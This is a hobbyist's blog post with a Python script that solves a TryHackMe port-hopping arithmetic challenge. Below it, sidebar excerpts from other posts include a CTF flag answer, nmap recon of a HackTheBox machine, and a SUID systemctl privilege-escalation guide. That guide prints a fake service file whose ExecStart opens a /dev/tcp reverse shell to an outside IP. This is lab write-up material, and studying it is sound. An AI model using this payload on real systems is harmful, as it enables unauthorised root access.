Skip to main content

Tryhackme Scripting Challenge 2



I just want to document this so I have it for the future. Here is a python script I wrote to solve this callenge on tryhack.me

Here are the requirements

You need to write a script that connects to this webserver on the correct port, do an operation on a number and then move onto the next port. Start your original number at 0.

The format is: operation, number, next port.

For example the website might display, add 900 3212 which would be: add 900 and move onto port 3212.

Then if it was minus 212 3499, you'd minus 212 (from the previous number which was 900) and move onto the next port 3499

Do this until you the page response is STOP (or you hit port 9765).

Each port is also only live for 4 seconds. After that it goes to the next port. You might have to wait until port 1337 becomes live again...

Go to: http://<machines_ip>:3010 to start...

General Approach(it's best to do this using the sockets library in Python):

  1. Create a socket in Python using the sockets library
  2. Connect to the port 
  3. Send an operation
  4. View response and continue

I didn't use sockets but it took the better part of two days for me to do this. I'm still working on learning python and the global variables threw me for a while...

ie.

Variables declared out site of functions are global variables that can be used in functions.....

however if you assign a value to that variable inside of a function it is no longer a global varialble but a local variable to that function...

WTF python?


import socket,time,sys,requests

host = "10.10.235.111"

quit = 0
count = 1
Number = 0.0

caught = ""
nextport = 1337


def loopy():
global caught
global nextport
global Number
global quit
caught = ""

NextURL = "http://" + host + ":" +str(nextport)
while True:
try:
r = requests.get(NextURL)
break

except:
pass
caught = r.content
caught = caught.decode("utf-8")
caughtlist = caught.split()
print(caughtlist)
if caughtlist[0] == "add":
Number += float(caughtlist[1])
elif caughtlist[0] == "minus":
Number -= float(caughtlist[1])
elif caughtlist[0] == "multiply":
Number *= float(caughtlist[1])
elif caughtlist[0] == "divide":
Number /= float(caughtlist[1])
elif caughtlist[0] == "STOP":
print("stop Found")
quit = 1
return
else:
print("oopsy")
nextport = caughtlist[2]
print("next port is : " + str(nextport) + " Current Value is : " + str(Number))



print("Starting Waiting for inital port")

while True:
if (quit != 1):
loopy()
else:
break

print("number is : ", + Number)






Comments

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar